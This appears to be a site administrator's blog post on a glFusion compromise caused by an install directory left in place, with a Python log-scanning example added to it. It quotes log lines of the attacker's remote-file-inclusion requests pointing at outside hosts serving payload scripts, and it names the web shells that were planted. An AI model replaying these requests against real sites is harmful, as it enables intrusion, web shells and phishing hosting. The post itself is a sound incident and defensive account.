Forgotten Update Leads to Compromised Site
OK - it was my fault, I admit it and I'll take my licks.
I was in the midst of doing a number of site updates of glFusion and got distracted midway through one of my own sites - and left the installation directory in place for over a month. No wonder the site was hacked. I should know better and now I ensure that this tool repository is removed no matter what, and that permissions are changed and things tidied up before I let myself get pulled away.
I've informed the glFusion support as well as SANS - and dumped a copy of the code on them. It turned out to be a couple of fairly well known tools, c99shell and fx29shell - with their names changed to css.php and cyber.php respectively.
I twigged to the exploit because the number of emails the hack created to one user at Yahoo got the Yahoo email system hot and bothered, and it slowed down reception of the stream long enough for a timeout message to be generated (4 hours) by the system - and I got the message since I'm the recipient of last resort for all such messages on the server.
That got me looking and I found the hack and disabled it. I spent most of the rest of the day inspecting the machine and documenting the hack - a nice sunny Sunday I'd rather have back thank you.
You may find some nuggets in the rest of the story.
I've been seeing the results of scans by robots looking for install setups on various software for years now. I get about 50 emails/day from systems after they've run their nightly log munging and rotations - and yes, I do look at the contents fairly closely.
Sample from one system today:
404 Not Found
/boutique/install.txt: 2 Time(s)
/butik/install.txt: 2 Time(s)
/cart/install.txt: 4 Time(s)
/catalog/install.txt: 2 Time(s)
/install.txt: 2 Time(s)
/shop/install.txt: 2 Time(s)
/shop2/install.txt: 2 Time(s)
/store/install.txt: 2 Time(s)
/zcart/install.txt: 2 Time(s)
/zen-cart/install.txt: 2 Time(s)
/zen/install.txt: 2 Time(s)
/zencart/install.txt: 2 Time(s)
And I even found the log entries from when they got my system - and what they did about it:
avail4.atl.gahost.com - - [04/Aug/2009:06:45:27 -0700] "GET //admin/install/index.php?mode='&dbconfig_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 200 16 "-" "Mozilla/5.0"
avail4.atl.gahost.com - - [04/Aug/2009:06:45:27 -0700] "GET //admin/install/index.php?mode='&dbconfig_path=http://www.die-grenzreiter.com/content/download/fx29id2.txt?? HTTP/1.1" 200 383 "-" "Mozilla/5.0"
avail4.atl.gahost.com - - [04/Aug/2009:06:45:28 -0700] "GET //admin/install/index.php?mode='&dbconfig_path=http://www.trustintomorrow.com/ourspaceimages//newswiremedia///pbot.txt?&modez=botz HTTP/1.1" 200 166 "-" "Mozilla/5.0"
Lots more where that came from - and that's why I keep logs pretty much "forever".
You'll note that they used their own database server - this was so they could bypass the authentication on my database. This is one of the major openings in most install programs - they assume you're a good guy and so pretty much allow you to do anything. In this case the install program asks for and uses any MySQL database server - using the construct you see in the URL above (a dbconfig_path parameter pointing at a remote file) rather than reading the "real" database settings from the db-config.php file as the rest of the system does after install. The install program has to be able to create the db-config.php file and run up to the point where that file is in place and the rest of the system is working correctly, so it will use whatever database you give it on the URL.
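Here is an added example, not code from the post or from glFusion, that pulls the two patterns above out of an Apache access log the way I ended up doing by hand: requests to install paths, and query parameters carrying a remote URL (the dbconfig_path trick). The sample lines are constructed to mirror the excerpt; the hosts and domains in them are placeholders.

```python
import re
from urllib.parse import parse_qsl

# Apache combined log format, as in the excerpt above.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Paths that only matter before install is finished; any hit after go-live is suspect.
INSTALL_PATHS = ("/install.txt", "/admin/install/", "/install/", "/setup/")

# Constructed sample lines modelled on the post's excerpt (hosts/domains are placeholders).
SAMPLE_LOG = """\
203.0.113.5 - - [04/Aug/2009:06:45:27 -0700] "GET //admin/install/index.php?mode='&dbconfig_path=http://example.invalid/fx29id.txt? HTTP/1.1" 200 16 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Aug/2009:06:45:28 -0700] "GET //admin/install/index.php?mode='&dbconfig_path=http://example.invalid/pbot.txt?&modez=botz HTTP/1.1" 200 166 "-" "Mozilla/5.0"
198.51.100.9 - - [04/Aug/2009:07:01:02 -0700] "GET /zen-cart/install.txt HTTP/1.1" 404 213 "-" "Mozilla/4.0"
192.0.2.77 - - [04/Aug/2009:07:05:00 -0700] "GET /article.php?story=20090804 HTTP/1.1" 200 9812 "-" "Mozilla/5.0"
"""

def classify(line):
    """Return the reasons a single log line is suspicious (empty list = nothing found)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    raw_path, _, query = m.group("target").partition("?")
    # Collapse the doubled slashes scanners use to slip past naive prefix filters.
    path = re.sub(r"/+", "/", raw_path)
    reasons = []
    if any(p in path for p in INSTALL_PATHS):
        reasons.append("install path: " + path)
    for key, value in parse_qsl(query, keep_blank_values=True):
        # A parameter whose value is a URL is the remote-include pattern from the post.
        if value.lower().startswith(("http://", "https://", "ftp://")):
            reasons.append("remote URL in parameter " + key)
    if reasons and m.group("status") == "200":
        reasons.append("served with 200 (install script still reachable)")
    return reasons

def scan(log_text):
    """Map each client host to the reasons for each of its suspicious requests."""
    hits = {}
    for line in log_text.splitlines():
        reasons = classify(line)
        if reasons:
            hits.setdefault(LOG_RE.match(line).group("host"), []).append(reasons)
    return hits

if __name__ == "__main__":
    for host, findings in scan(SAMPLE_LOG).items():
        print(host, findings)
```

A 404 on an install path is just the nightly scanner noise described earlier; a 200 on one means the install directory is still there and that is the line to act on.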
After that it was grepping through log files looking for anything else that referenced the css.php and/or cyber.php files that were injected into my /images/library area - which has to be writeable since it is where the glFusion system puts images you're going to upload for your stories.
The hacker in this case knows enough about Geeklog/glFusion to know where to write stuff - but I'm guessing they really don't know much more, or simply didn't get time. The original compromise happened a full month before the rest of the hack took place and a bank phishing site was uploaded to my machine and became active. It was only active for a few hours but in that time there were quite a few responses that hit the phishing HTML area. I'm hoping it was mostly "haha fooled you" kinds of responses rather than real people entering their account information. I've seen the output from another hack of similar nature that put the results into a file instead of emailing them out real-time as this one did, and most of the information was obviously bogus. But some of it sure looked real to me and likely represented a number of soon-to-be very annoyed people.
The bottom line is that in this case I was lucky. I caught on soon, the rest of the computer has not been touched, and this was the only one of the many sites I administer that got caught. With a bit more time I'm guessing that this hacker could have done quite a bit more damage both to my machine and my reputation - as the URL for all the phishing has one of my domains in it.
So... ensure you don't leave the install stuff around - and better yet, if you have the ability to change the directory names of some or all of a software's active bits it sure makes sense to. This "security by obscurity" is not truly secure, but with the hackers mostly going for the "low-hanging fruit" of standard installation paths the chances are that your site will not be touched, even if you don't lock it down much better than I did.
Note: I've received a follow up from Mark at glFusion telling me some of the things he's doing to lock down the install process in case it is left in place as I did. There are all manner of things we've discussed and I feel sure that these will make it much tougher in the future to compromise a system this way - but it is still a great idea to get rid of the install stuff anyway.
Tag: glfusion install hack malware